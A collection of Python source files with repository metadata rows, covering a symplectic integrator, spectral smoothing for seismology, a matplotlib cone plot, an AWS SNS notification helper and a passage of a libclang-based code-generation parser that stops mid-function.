| 33.588529 | 345 | 0.604796 | 1,674 | 13,469 | 5.120072 | 0.244325 | 0.039902 | 0.016801 | 0.021001 | 0.241045 | 0.205227 | 0.154008 | 0.139424 | 0.094738 | 0.076537 | 0 | 0.002879 | 0.25206 | 13,469 | 400 | 346 | 33.6725 | 0.7973 | 0.091469 | 0 | 0.254902 | 0 | 0.035294 | 0.331164 | 0.059186 | 0 | 0 | 0 | 0 | 0 | 1 | 0.003922 | false | 0.011765 | 0.062745 | 0 | 0.070588 | 0.152941 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e68681a8b4c1d22d57880c0f3f4450cada8817d | 7,323 | py | Python | vorpy/symplectic_integration/separable_hamiltonian.py | vdods/vorpy | 68b6525ae43d99f451cf85ce254ffb0311521320 | [
"MIT"
] | 3 | 2017-07-08T14:41:46.000Z | 2020-02-11T17:33:57.000Z | vorpy/symplectic_integration/separable_hamiltonian.py | vdods/vorpy | 68b6525ae43d99f451cf85ce254ffb0311521320 | [
"MIT"
] | null | null | null | vorpy/symplectic_integration/separable_hamiltonian.py | vdods/vorpy | 68b6525ae43d99f451cf85ce254ffb0311521320 | [
"MIT"
] | null | null | null | """
Implements a family of separable Hamiltonian symplectic integrators, where the family is parameterized by the
coefficients which define the weights for each update step. A separable Hamiltonian has the form
H(q,p) = K(p) + V(q)
where K and V are prototypically the kinetic and potential energy functions, respectively. In this case,
Hamilton's equations are
dq/dt = \partial K / \partial p
dp/dt = - \partial V / \partial q
and a leapfrog technique is used to implement the integration using the provided update step coefficients.
For convenience, this module provides several predefined values in the module-level update_step_coefficients
variable which may be used to specify the update_step_coefficients parameter of the integrate function. This
parameter defines the order of the integrator as well as other particular properties.
References
https://en.wikipedia.org/wiki/Symplectic_integrator
https://en.wikipedia.org/wiki/Energy_drift
"""
import collections
import numpy as np
from .. import apply_along_axes
from . import exceptions
def __make_ruth4_update_step_coefficients ():
cbrt_2 = 2.0**(1.0/3.0)
b = 2.0 - cbrt_2
c_0 = c_3 = 0.5/b
c_1 = c_2 = 0.5*(1.0 - cbrt_2)/b
d_0 = d_2 = 1.0/b
d_1 = -cbrt_2/b
d_3 = 0.0
return np.array([
[c_0, c_1, c_2, c_3],
[d_0, d_1, d_2, d_3]
])
UpdateStepCoefficients = collections.namedtuple('UpdateStepCoefficients', ['euler1', 'verlet2', 'ruth3', 'ruth4'])
update_step_coefficients = UpdateStepCoefficients(
# euler1
np.array([
[1.0],
[1.0]
]),
# verlet2
np.array([
[0.0, 1.0],
[0.5, 0.5]
]),
# ruth3
np.array([
[1.0, -2.0/3.0, 2.0/3.0],
[-1.0/24.0, 0.75, 7.0/24.0]
]),
# ruth4
__make_ruth4_update_step_coefficients()
)
def integrate (*, initial_coordinates, t_v, dK_dp, dV_dq, update_step_coefficients):
"""
This function computes multiple timesteps of the separable Hamiltonian symplectic integrator defined by the
update_step_coefficients parameter.
Let N denote the dimension of the configuration space (i.e. the number of components of the q coordinate).
A single set of coordinates shall be represented with a numpy array of shape (2,N).
Parameters:
- initial_coordinates specify the coordinates from which to begin integrating. This should have
the shape (A_1,A_2,...,A_M,2,N), where M might be zero (in which case the shape is (2,N)).
The indices A_1,A_2,...,A_M (of which there can be none) may index some other parameter to
the initial conditions, such that many integral curves will be computed in parallel (one for
each assignment of A_1,A_2,...,A_M index).
- t_v specifies a list of the time values at which to integrate the system. The first value corresponds
to the initial condition, so the length of t_v must be at least 1. The timesteps are computed as the
difference between successive elements. The timesteps can be negative; see
https://en.wikipedia.org/wiki/Symplectic_integrator#A_second-order_example
- dK_dp and dV_dq should be functions of the respective forms
lambda p : <expression evaluating \partial K / \partial p>
lambad q : <expression evaluating \partial V / \partial q>
and should each accept and return a vector having N components.
- update_step_coefficients should be a numpy.ndarray with shape (2,K), where K is the order of the integrator.
These coefficients define the specific integrator by defining the weight of each leapfrog update
step. Row 0 and row 1 correspond to the update step weight for even and odd leapfrog update steps
respectively. Predefined coefficients are available via the update_step_coefficients variable found in
this module. In particular,
update_step_coefficients.euler1 : 1st order
update_step_coefficients.verlet2 : 2nd order
update_step_coefficients.ruth3 : 3rd order
update_step_coefficients.ruth4 : 4rd order
The rows of update_step_coefficients must sum to one, i.e.
all(numpy.sum(update_step_coefficients[i]) == 1.0 for i in [0,1])
and are described at https://en.wikipedia.org/wiki/Symplectic_integrator
Return values:
- integrated_coordinates is a numpy.ndarray having shape (len(t_v),A_1,A_2,...,A_M,2,N), containing the coordinates of
each integrator step starting with initial_coordinates.
"""
initial_coordinates_shape = np.shape(initial_coordinates)
update_step_coefficients_shape = np.shape(update_step_coefficients)
assert len(initial_coordinates_shape) >= 2
assert initial_coordinates_shape[-2] == 2
assert len(t_v) >= 1
assert update_step_coefficients_shape[0] == 2, 'update_step_coefficients must have shape (2,K), where K is the order of the integrator.'
assert np.allclose(np.sum(update_step_coefficients, axis=1), 1.0), 'rows of update_step_coefficients must sum to 1.0 (within numerical tolerance)'
# N is the dimension of the underlying configuration space. Thus 2*N is the dimension of the phase space,
# hence a coordinate of the phase space having shape (2,N).
N = initial_coordinates_shape[-1]
# get the axes not corresponding to the final (2,N) part of the shape. This can be the empty tuple.
non_coordinate_shape = initial_coordinates_shape[:-2]
non_coordinate_axis_v = tuple(range(len(non_coordinate_shape)))
# T is the number of timesteps
T = len(t_v)
# Create the return value
integrated_coordinates = np.ndarray((T,)+non_coordinate_shape+(2,N), dtype=initial_coordinates.dtype)
# Create a buffer for intermediate coordinates
current_coordinates = np.copy(initial_coordinates)
# Create slices to address the q and p components of current_coordinates.
q = current_coordinates[...,0,:]
p = current_coordinates[...,1,:]
# Store the initial coordinates (which current_coordinates is currently equal to).
integrated_coordinates[0,...] = current_coordinates
for step_index,timestep in enumerate(np.diff(t_v)):
try:
# Iterate over (c,d) pairs and perform the leapfrog update steps.
for c,d in zip(update_step_coefficients[0],update_step_coefficients[1]):
# The (2,N) phase space is indexed by the last two indices, i.e. (-2,-1) in that order.
q += timestep*c*apply_along_axes(dK_dp, (-1,), (p,), output_axis_v=(-1,), func_output_shape=(N,))
p -= timestep*d*apply_along_axes(dV_dq, (-1,), (q,), output_axis_v=(-1,), func_output_shape=(N,))
# Store the results.
integrated_coordinates[step_index+1,...] = current_coordinates
except Exception as e:
# If a non-system-exiting or user-defined exception was encountered, then salvage the part
# of the curve that was computed without error.
raise exceptions.SalvagedResultException(
original_exception=e,
salvaged_t_v=np.copy(t_v[:step_index+1]),
salvaged_qp_v=np.copy(integrated_coordinates[:step_index+1,...])
) from e
return integrated_coordinates
| 44.381818 | 150 | 0.69548 | 1,088 | 7,323 | 4.525735 | 0.26011 | 0.054833 | 0.10723 | 0.015435 | 0.139724 | 0.081844 | 0.071284 | 0.045085 | 0.015435 | 0.015435 | 0 | 0.025223 | 0.220401 | 7,323 | 164 | 151 | 44.652439 | 0.837274 | 0.590195 | 0 | 0.096774 | 0 | 0 | 0.073747 | 0.0247 | 0 | 0 | 0 | 0 | 0.080645 | 1 | 0.032258 | false | 0 | 0.064516 | 0 | 0.129032 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e6bf6742a02077e6b21992401210c8cc43b72cf | 11,270 | py | Python | IRIS_data_download/IRIS_download_support/obspy/signal/konnoohmachismoothing.py | earthinversion/Fnet_IRIS_data_automated_download | 09a6e0c992662feac95744935e038d1c68539fa1 | [
"MIT"
] | 2 | 2020-03-05T01:03:01.000Z | 2020-12-17T05:04:07.000Z | IRIS_data_download/IRIS_download_support/obspy/signal/konnoohmachismoothing.py | earthinversion/Fnet_IRIS_data_automated_download | 09a6e0c992662feac95744935e038d1c68539fa1 | [
"MIT"
] | 4 | 2021-03-31T19:25:55.000Z | 2021-12-13T20:32:46.000Z | IRIS_data_download/IRIS_download_support/obspy/signal/konnoohmachismoothing.py | earthinversion/Fnet_IRIS_data_automated_download | 09a6e0c992662feac95744935e038d1c68539fa1 | [
"MIT"
] | 2 | 2020-09-08T19:33:40.000Z | 2021-04-05T09:47:50.000Z | # -*- coding: utf-8 -*-
# ------------------------------------------------------------------
# Filename: konnoohmachismoothing.py
# Purpose: Small module to smooth spectra with the so called Konno & Ohmachi
# method.
# Author: Lion Krischer
# Email: krischer@geophysik.uni-muenchen.de
# License: GPLv2
#
# Copyright (C) 2011 Lion Krischer
# --------------------------------------------------------------------
"""
Functions to smooth spectra with the so called Konno & Ohmachi method.
:copyright:
The ObsPy Development Team (devs@obspy.org)
:license:
GNU Lesser General Public License, Version 3
(https://www.gnu.org/copyleft/lesser.html)
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from future.builtins import * # NOQA
import warnings
import numpy as np
def konno_ohmachi_smoothing_window(frequencies, center_frequency,
bandwidth=40.0, normalize=False):
"""
Returns the Konno & Ohmachi Smoothing window for every frequency in
frequencies.
Returns the smoothing window around the center frequency with one value per
input frequency defined as follows (see [Konno1998]_)::
[sin(b * log_10(f/f_c)) / (b * log_10(f/f_c)]^4
b = bandwidth
f = frequency
f_c = center frequency
The bandwidth of the smoothing function is constant on a logarithmic scale.
A small value will lead to a strong smoothing, while a large value of will
lead to a low smoothing of the Fourier spectra.
The default (and generally used) value for the bandwidth is 40. (From the
`Geopsy documentation <http://www.geopsy.org>`_)
All parameters need to be positive. This is not checked due to performance
reasons and therefore any negative parameters might have unexpected
results.
:type frequencies: :class:`numpy.ndarray` (float32 or float64)
:param frequencies:
All frequencies for which the smoothing window will be returned.
:type center_frequency: float
:param center_frequency:
The frequency around which the smoothing is performed. Must be greater
or equal to 0.
:type bandwidth: float
:param bandwidth:
Determines the width of the smoothing peak. Lower values result in a
broader peak. Must be greater than 0. Defaults to 40.
:type normalize: bool, optional
:param normalize:
The Konno-Ohmachi smoothing window is normalized on a logarithmic
scale. Set this parameter to True to normalize it on a normal scale.
Default to False.
"""
if frequencies.dtype != np.float32 and frequencies.dtype != np.float64:
msg = 'frequencies needs to have a dtype of float32/64.'
raise ValueError(msg)
# If the center_frequency is 0 return an array with zero everywhere except
# at zero.
if center_frequency == 0:
smoothing_window = np.zeros(len(frequencies), dtype=frequencies.dtype)
smoothing_window[frequencies == 0.0] = 1.0
return smoothing_window
# Disable div by zero errors and return zero instead
with np.errstate(divide='ignore', invalid='ignore'):
# Calculate the bandwidth*log10(f/f_c)
smoothing_window = bandwidth * np.log10(frequencies / center_frequency)
# Just the Konno-Ohmachi formulae.
smoothing_window[:] = (
np.sin(smoothing_window) / smoothing_window) ** 4
# Check if the center frequency is exactly part of the provided
# frequencies. This will result in a division by 0. The limit of f->f_c is
# one.
smoothing_window[frequencies == center_frequency] = 1.0
# Also a frequency of zero will result in a logarithm of -inf. The limit of
# f->0 with f_c!=0 is zero.
smoothing_window[frequencies == 0.0] = 0.0
# Normalize to one if wished.
if normalize:
smoothing_window /= smoothing_window.sum()
return smoothing_window
def calculate_smoothing_matrix(frequencies, bandwidth=40.0, normalize=False):
"""
Calculates a len(frequencies) x len(frequencies) matrix with the Konno &
Ohmachi window for each frequency as the center frequency.
Any spectrum with the same frequency bins as this matrix can later be
smoothed by using
:func:`~obspy.signal.konnoohmachismoothing.apply_smoothing_matrix`.
This also works for many spectra stored in one large matrix and is even
more efficient.
This makes it very efficient for smoothing the same spectra again and again
but it comes with a high memory consumption for larger frequency arrays!
:type frequencies: :class:`numpy.ndarray` (float32 or float64)
:param frequencies:
The input frequencies.
:type bandwidth: float
:param bandwidth:
Determines the width of the smoothing peak. Lower values result in a
broader peak. Must be greater than 0. Defaults to 40.
:type normalize: bool, optional
:param normalize:
The Konno-Ohmachi smoothing window is normalized on a logarithmic
scale. Set this parameter to True to normalize it on a normal scale.
Default to False.
"""
# Create matrix to be filled with smoothing entries.
sm_matrix = np.empty((len(frequencies), len(frequencies)),
frequencies.dtype)
for _i, freq in enumerate(frequencies):
sm_matrix[_i, :] = konno_ohmachi_smoothing_window(
frequencies, freq, bandwidth, normalize=normalize)
return sm_matrix
def apply_smoothing_matrix(spectra, smoothing_matrix, count=1):
"""
Smooths a matrix containing one spectra per row with the Konno-Ohmachi
smoothing window, using a smoothing matrix pre-computed through the
:func:`~obspy.signal.konnoohmachismoothing.calculate_smoothing_matrix`
function.
This function is useful if one needs to smooth the same type of spectrum
(same shape) through different function calls.
All spectra need to have frequency bins corresponding to the same
frequencies.
"""
if spectra.dtype not in (np.float32, np.float64):
msg = '`spectra` needs to have a dtype of float32/64.'
raise ValueError(msg)
new_spec = np.dot(spectra, smoothing_matrix)
# Eventually apply more than once.
for _i in range(count - 1):
new_spec = np.dot(new_spec, smoothing_matrix)
return new_spec
def konno_ohmachi_smoothing(spectra, frequencies, bandwidth=40, count=1,
enforce_no_matrix=False, max_memory_usage=512,
normalize=False):
"""
Smooths a matrix containing one spectra per row with the Konno-Ohmachi
smoothing window.
All spectra need to have frequency bins corresponding to the same
frequencies.
This method first will estimate the memory usage and then either use a fast
and memory intensive method or a slow one with a better memory usage.
:type spectra: :class:`numpy.ndarray` (float32 or float64)
:param spectra:
One or more spectra per row. If more than one the first spectrum has to
be accessible via spectra[0], the next via spectra[1], ...
:type frequencies: :class:`numpy.ndarray` (float32 or float64)
:param frequencies:
Contains the frequencies for the spectra.
:type bandwidth: float
:param bandwidth:
Determines the width of the smoothing peak. Lower values result in a
broader peak. Must be greater than 0. Defaults to 40.
:type count: int, optional
:param count:
How often the apply the filter. For very noisy spectra it is useful to
apply is more than once. Defaults to 1.
:type enforce_no_matrix: bool, optional
:param enforce_no_matrix:
An efficient but memory intensive matrix-multiplication algorithm is
used in case more than one spectra is to be smoothed or one spectrum is
to be smoothed more than once if enough memory is available. This flag
disables the matrix algorithm altogether. Defaults to False
:type max_memory_usage: int, optional
:param max_memory_usage:
Set the maximum amount of extra memory in MB for this method. Decides
whether or not the matrix multiplication method is used. Defaults to
512 MB.
:type normalize: bool, optional
:param normalize:
The Konno-Ohmachi smoothing window is normalized on a logarithmic
scale. Set this parameter to True to normalize it on a normal scale.
Default to False.
"""
if spectra.dtype not in (np.float32, np.float64):
msg = '`spectra` needs to have a dtype of float32/64.'
raise ValueError(msg)
if frequencies.dtype not in (np.float32, np.float64):
msg = '`frequencies` needs to have a dtype of float32/64.'
raise ValueError(msg)
# Spectra and frequencies should have the same dtype.
if frequencies.dtype != spectra.dtype:
frequencies = np.require(frequencies, np.float64)
spectra = np.require(spectra, np.float64)
msg = '`frequencies` and `spectra` should have the same dtype. It ' + \
'will be changed to np.float64 for both.'
warnings.warn(msg)
# Check the dtype to get the correct size.
if frequencies.dtype == np.float32:
size = 4.0
elif frequencies.dtype == np.float64:
size = 8.0
# Calculate the approximate usage needs for the smoothing matrix algorithm.
length = len(frequencies)
approx_mem_usage = (length * length + 2 * len(spectra) + length) * \
size / 1048576.0
# If smaller than the allowed maximum memory consumption build a smoothing
# matrix and apply to each spectrum. Also only use when more then one
# spectrum is to be smoothed.
if enforce_no_matrix is False and (len(spectra.shape) > 1 or count > 1) \
and approx_mem_usage < max_memory_usage:
smoothing_matrix = calculate_smoothing_matrix(
frequencies, bandwidth, normalize=normalize)
return apply_smoothing_matrix(spectra, smoothing_matrix, count=count)
# Otherwise just calculate the smoothing window every time and apply it.
else:
new_spec = np.empty(spectra.shape, spectra.dtype)
# Separate case for just one spectrum.
if len(new_spec.shape) == 1:
for _i in range(len(frequencies)):
window = konno_ohmachi_smoothing_window(
frequencies, frequencies[_i], bandwidth,
normalize=normalize)
new_spec[_i] = (window * spectra).sum()
# Reuse smoothing window if more than one spectrum.
else:
for _i in range(len(frequencies)):
window = konno_ohmachi_smoothing_window(
frequencies, frequencies[_i], bandwidth,
normalize=normalize)
for _j, spec in enumerate(spectra):
new_spec[_j, _i] = (window * spec).sum()
# Eventually apply more than once.
for _i in range(count - 1):
new_spec = konno_ohmachi_smoothing(
new_spec, frequencies, bandwidth, enforce_no_matrix=True,
normalize=normalize)
return new_spec
| 43.682171 | 79 | 0.670541 | 1,479 | 11,270 | 5.030426 | 0.218391 | 0.052419 | 0.033871 | 0.03629 | 0.376613 | 0.311156 | 0.302016 | 0.284274 | 0.28172 | 0.28172 | 0 | 0.016961 | 0.251908 | 11,270 | 257 | 80 | 43.85214 | 0.865496 | 0.574091 | 0 | 0.294118 | 0 | 0 | 0.069412 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047059 | false | 0 | 0.047059 | 0 | 0.164706 | 0.011765 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e6c3f82af976559e939a2459be138b4fcfdc18c | 2,515 | py | Python | igmtools/plot/special.py | cwfinn/igmtools | 6e14973fd1e69d5e7bd7c40f93ffe11e2cd41990 | [
"BSD-3-Clause"
] | null | null | null | igmtools/plot/special.py | cwfinn/igmtools | 6e14973fd1e69d5e7bd7c40f93ffe11e2cd41990 | [
"BSD-3-Clause"
] | null | null | null | igmtools/plot/special.py | cwfinn/igmtools | 6e14973fd1e69d5e7bd7c40f93ffe11e2cd41990 | [
"BSD-3-Clause"
] | 1 | 2019-11-19T04:45:38.000Z | 2019-11-19T04:45:38.000Z | """
Specialist plots.
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from .general import Plot
from matplotlib.transforms import Affine2D
from matplotlib.projections import PolarAxes
from mpl_toolkits.axisartist.grid_finder import MaxNLocator
from mpl_toolkits.axes_grid1 import make_axes_locatable
import mpl_toolkits.axisartist.floating_axes as floating_axes
import mpl_toolkits.axisartist.angle_helper as angle_helper
from matplotlib.axes import Axes
import numpy as np
class ConePlot(Plot):
"""
Defines the layout of a cone plot.
"""
def __init__(self, rotation, ra_min, ra_max, z_min, z_max, stretch=1,
nrows=1, ncols=1, npar=1, width=8.0, aspect=0.8,
gridspec=None, blank=True, fontsize=16, legend_fontsize=14,
family='serif', style='Times', weight='normal', usetex=False):
super(ConePlot, self).__init__(
nrows, ncols, npar, width, aspect, gridspec, blank, fontsize,
legend_fontsize, family, style, weight, usetex)
# Rotate for better orientation:
rotate = Affine2D().translate(rotation, 0)
# Scale degree to radians:
scale = Affine2D().scale(np.pi * stretch / 180, 1)
transform = rotate + scale + PolarAxes.PolarTransform()
grid_locator1 = angle_helper.LocatorHMS(4)
grid_locator2 = MaxNLocator(5)
tick_formatter1 = angle_helper.FormatterHMS()
self.grid_helper = floating_axes.GridHelperCurveLinear(
transform, extremes=(ra_min, ra_max, z_min, z_max),
grid_locator1=grid_locator1, grid_locator2=grid_locator2,
tick_formatter1=tick_formatter1, tick_formatter2=None)
ax = floating_axes.FloatingSubplot(
self, 111, grid_helper=self.grid_helper)
ax.axis['left'].set_axis_direction('bottom')
ax.axis['right'].set_axis_direction('top')
ax.axis['bottom'].set_visible(False)
ax.axis['top'].set_axis_direction('bottom')
ax.axis['top'].toggle(ticklabels=True, label=True)
ax.axis['top'].major_ticklabels.set_axis_direction('top')
ax.axis['top'].label.set_axis_direction('top')
ax.axis['left'].label.set_text('Redshift')
ax.axis['top'].label.set_text('RA (J2000)')
aux_ax = ax.get_aux_axes(transform)
aux_ax.patch = ax.patch
ax.patch.zorder = 0.9
self.add_subplot(ax)
self.aux_ax = aux_ax
| 32.24359 | 79 | 0.668787 | 317 | 2,515 | 5.069401 | 0.394322 | 0.033603 | 0.049782 | 0.03547 | 0.119477 | 0.10392 | 0.022402 | 0.022402 | 0 | 0 | 0 | 0.021494 | 0.223062 | 2,515 | 77 | 80 | 32.662338 | 0.800921 | 0.04334 | 0 | 0 | 0 | 0 | 0.037395 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022222 | false | 0 | 0.222222 | 0 | 0.266667 | 0.022222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e6dc0ca5c7ca67c2ac3d9248b5244fdd0c19cc9 | 431 | py | Python | ChaosMonkey/notification.py | RedXIV2/TUD-ChaosMonkey | d73d5ed13d0fc353d8204f7abecd0344c4c1439d | [
"MIT"
] | 1 | 2019-03-21T13:46:25.000Z | 2019-03-21T13:46:25.000Z | ChaosMonkey/notification.py | RedXIV2/TUD-ChaosMonkey | d73d5ed13d0fc353d8204f7abecd0344c4c1439d | [
"MIT"
] | null | null | null | ChaosMonkey/notification.py | RedXIV2/TUD-ChaosMonkey | d73d5ed13d0fc353d8204f7abecd0344c4c1439d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Author: Dave Hill
# This code will trigger a SNS notification
import boto3
# CONSTANTS
TARGET_ARN = "arn:aws:sns:eu-west-1:924169754118:chaosMonkey-notifications"
def sendSNSNotification(deliverableMessage):
snsClient = boto3.client('sns')
response = snsClient.publish(
TargetArn=TARGET_ARN,
Message=deliverableMessage
)
print("Sending notification to "+TARGET_ARN)
| 21.55 | 75 | 0.714617 | 48 | 431 | 6.354167 | 0.770833 | 0.088525 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.045198 | 0.178654 | 431 | 19 | 76 | 22.684211 | 0.816384 | 0.211137 | 0 | 0 | 0 | 0 | 0.262048 | 0.180723 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0 | 0.222222 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e6e6f169fa35ff46472321863b6b4d79335d9a8 | 23,977 | py | Python | python/vineyard/core/codegen/parsing.py | septicmk/v6d | 3c64e0a324adfe71feb4bfda51d0e55724bfde8d | [
"Apache-2.0"
] | null | null | null | python/vineyard/core/codegen/parsing.py | septicmk/v6d | 3c64e0a324adfe71feb4bfda51d0e55724bfde8d | [
"Apache-2.0"
] | null | null | null | python/vineyard/core/codegen/parsing.py | septicmk/v6d | 3c64e0a324adfe71feb4bfda51d0e55724bfde8d | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020-2021 Alibaba Group Holding Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import itertools
import logging
import os
from collections import Counter
from typing import List
from typing import Optional
from typing import Tuple
DEP_MISSING_ERROR = '''
Dependencies {dep} cannot be found, please try again after:
pip3 install {dep}
'''
try:
import clang.cindex as cindex
from clang.cindex import Cursor
from clang.cindex import CursorKind
from clang.cindex import Type
from clang.cindex import TypeKind
except ImportError:
raise RuntimeError(DEP_MISSING_ERROR.format(dep='libclang'))
###############################################################################
#
# parse codegen spec:
#
# __attribute__((annotate("vineyard"))): vineyard classes
# __attribute__((annotate("shared"))): shared member/method
# __attribute__((annotate("streamable"))): shared member/method
# __attribute__((annotate("distributed"))): shared member/method
#
class CodeGenKind:
def __init__(self, kind='meta', element_type=None):
self.kind = kind
if element_type is None:
self.element_type = None
self.star = ''
else:
if isinstance(element_type[0], tuple):
self.element_type = (element_type[0][0], element_type[1][0])
self.star = element_type[1][1]
else:
self.element_type = element_type[0]
self.star = element_type[1]
if self.star:
self.deref = ''
else:
self.deref = '*'
@property
def is_meta(self):
return self.kind == 'meta'
@property
def is_plain(self):
return self.kind == 'plain'
@property
def is_set(self):
return self.kind == 'set'
@property
def is_list(self):
return self.kind == 'list'
@property
def is_dlist(self):
return self.kind == 'dlist'
@property
def is_dict(self):
return self.kind == 'dict'
def __repr__(self):
star_str = '*' if self.star else ''
if self.is_meta:
return 'meta'
if self.is_plain:
return '%s%s' % (self.element_type, star_str)
if self.is_list:
return '[%s%s]' % (self.element_type, star_str)
if self.is_dlist:
return '[[%s%s]]' % (self.element_type, star_str)
if self.is_set:
return '{%s%s}' % (self.element_type, star_str)
if self.is_dict:
return '{%s: %s%s}' % (self.element_type[0], self.element_type[1], star_str)
raise RuntimeError('Invalid codegen kind: %s' % self.kind)
def figure_out_namespace(node: Cursor) -> Optional[str]:
while True:
parent = node.semantic_parent
if parent is None:
return None
if parent.kind == CursorKind.NAMESPACE:
parent_ns = figure_out_namespace(parent)
if parent_ns is None:
return parent.spelling
else:
return '%s::%s' % (parent_ns, parent.spelling)
node = parent
def unpack_pointer_type(node_type: Type) -> Tuple[Type, str, str]:
if node_type.kind == TypeKind.POINTER:
node_type = node_type.get_pointee()
star = '*'
else:
basename = node_type.spelling.split('<')[0]
namespace = figure_out_namespace(node_type.get_declaration())
if (
basename == 'std::shared_ptr'
or namespace in ['std', 'std::__1']
and basename == 'shared_ptr'
or basename == 'std::unique_ptr'
or namespace in ['std', 'std::__1']
and basename == 'unique_ptr'
):
star = '*'
node_type = node_type.get_template_argument_type(0)
namespace = figure_out_namespace(node_type.get_declaration())
else:
star = ''
node_typename = node_type.spelling
if namespace is not None and node_typename.startswith(namespace):
node_typename = node_typename[len(namespace) + 2 :]
return node_type, star, node_typename
def is_template_parameter(node: Cursor, typename: str) -> bool:
parent = node.semantic_parent
if parent is None:
return False
if parent.kind == CursorKind.CLASS_TEMPLATE:
for ch in parent.get_children():
if ch.kind == CursorKind.TEMPLATE_TYPE_PARAMETER:
if typename == ch.spelling:
return True
return False
def is_primitive_types(
node: Cursor, node_type: "cindex.Type", typename: str, star: str
) -> bool:
if star:
return False
if node_type.is_pod():
return True
if is_template_parameter(node, typename):
# treat template parameter as meta, see `scalar.vineyard-mod`.
return True
return typename in [
'std::string',
'String',
'vineyard::String',
'json',
'vineyard::json',
]
def is_list_type(namespace: str, basename: str) -> bool:
return (
basename in ['vineyard::Tuple', 'vineyard::List']
or namespace == 'vineyard'
and basename in ['Tuple', 'List']
)
def is_dict_type(namespace: str, basename: str) -> bool:
return (
basename == 'vineyard::Map'
or basename == 'vineyard::UnorderedMap'
or namespace == 'vineyard'
and (basename == 'Map' or basename == 'UnorderedMap')
)
def parse_codegen_spec_from_type(node: Cursor):
node_type, star, typename = unpack_pointer_type(node.type)
if star:
_, star_inside, _ = unpack_pointer_type(node_type)
if star_inside:
raise ValueError(
'Pointer of pointer %s is not supported' % node.type.spelling
)
basename = typename.split('<')[0]
namespace = figure_out_namespace(node_type.get_declaration())
if not star:
if is_list_type(namespace, basename):
element_type = node_type.get_template_argument_type(0)
nested_base_name = element_type.spelling.split('<')[0]
nested_namespace = figure_out_namespace(element_type.get_declaration())
if is_list_type(nested_namespace, nested_base_name):
element_type = element_type.get_template_argument_type(0)
element_type, inside_star, element_typename = unpack_pointer_type(
element_type
)
typekind = 'dlist'
else:
element_type, inside_star, element_typename = unpack_pointer_type(
element_type
)
if is_primitive_types(
node, element_type, element_typename, inside_star
):
if inside_star:
raise ValueError(
'pointer of primitive types inside Tuple/List is not '
'supported: %s' % node.type.spelling
)
return CodeGenKind('meta')
else:
typekind = 'list'
return CodeGenKind(typekind, (element_typename, inside_star))
if is_dict_type(namespace, basename):
key_type = node_type.get_template_argument_type(0)
key_typename = key_type.spelling
value_type = node_type.get_template_argument_type(1)
value_type, inside_star, value_typename = unpack_pointer_type(value_type)
if is_primitive_types(node, value_type, value_typename, inside_star):
if inside_star:
raise ValueError(
'pointer of primitive types inside Map is not supported: %s'
% node.type.spelling
)
return CodeGenKind('meta')
else:
return CodeGenKind(
'dict', ((key_typename,), (value_typename, inside_star))
)
if is_primitive_types(node, node_type, typename, star):
return CodeGenKind('meta')
else:
# directly return: generate data members, in pointer format
return CodeGenKind('plain', (basename, star))
###############################################################################
#
# dump the AST for debugging
#
def is_std_ns(node: Cursor) -> bool:
if node.kind == CursorKind.NAMESPACE:
if node.spelling == 'std':
return True
if node.spelling == '__1':
parent: Cursor = node.semantic_parent
if (
parent is not None
and parent.kind == CursorKind.NAMESPACE
and parent.spelling == 'std'
):
return True
return False
def is_reference_node(node):
return node.kind in [
CursorKind.TYPE_REF,
CursorKind.TEMPLATE_REF,
CursorKind.MEMBER_REF,
CursorKind.OVERLOADED_DECL_REF,
CursorKind.VARIABLE_REF,
]
def dump_ast(
node, indent=0, saw=None, base_indent=4, include_refs=False, include_ref_depth=1
):
if saw is None:
saw = Counter()
k: "CursorKind" = node.kind
# skip printting UNEXPOSED_*
if not k.is_unexposed():
tpl = '{indent}{kind}{name}{type_name}'
if node.spelling:
name = ' s: %s' % node.spelling
else:
name = ''
if node.type and node.type.spelling:
type_name = ', t: %s' % node.type.spelling
else:
type_name = ''
# FIXME: print opcode or literal
print(
